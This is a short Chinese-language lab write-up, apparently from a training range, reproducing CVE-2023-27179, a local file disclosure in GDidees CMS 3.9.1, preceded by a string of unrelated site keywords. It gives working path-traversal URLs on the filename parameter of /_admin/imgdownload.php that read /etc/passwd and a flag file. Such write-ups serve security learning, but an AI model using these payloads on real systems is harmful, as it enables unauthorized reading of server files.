哪个网站教做西餐,怎么把网站源码上传到空间根目录视频,网站平台定制开发,网站模板 源码之家漏洞简介#xff1a;
GDidees CMS v3.9.1及更低版本被发现存在本地文件泄露漏洞#xff0c;漏洞通过位于 /_admin/imgdownload.php 的 filename 参数进行利用。
漏洞环境#xff1a;
春秋云镜中的漏洞靶标#xff0c;CVE编号为CVE-2023-27179
漏洞复现:
进入靶场发现没…漏洞简介
GDidees CMS v3.9.1及更低版本被发现存在本地文件泄露漏洞漏洞通过位于 /_admin/imgdownload.php 的 filename 参数进行利用。
漏洞环境
春秋云镜中的漏洞靶标CVE编号为CVE-2023-27179
漏洞复现:
进入靶场发现没有什么可以利用的地方那么就按照靶场提示来直接访问/_admin/imgdownload.php
打开后发现是一片空白那么直接上参数filename
第一次尝试
http://eci-2ze1l7f5cevdmi4pngfi.cloudeci1.ichunqiu.com/_admin/imgdownload.php?filename../../../../../../etc/passwd
发现下载了一张图片 用notepad打开图片发现确实获取到了用户的信息
那么直接获取flag
eci-2ze1l7f5cevdmi4pngfi.cloudeci1.ichunqiu.com/_admin/imgdownload.php?filename../../../../../../flag 或者还有一种办法是我们用bp抓包放到重放器里可以直接回显出文件内容 或者是直接用curl指令请求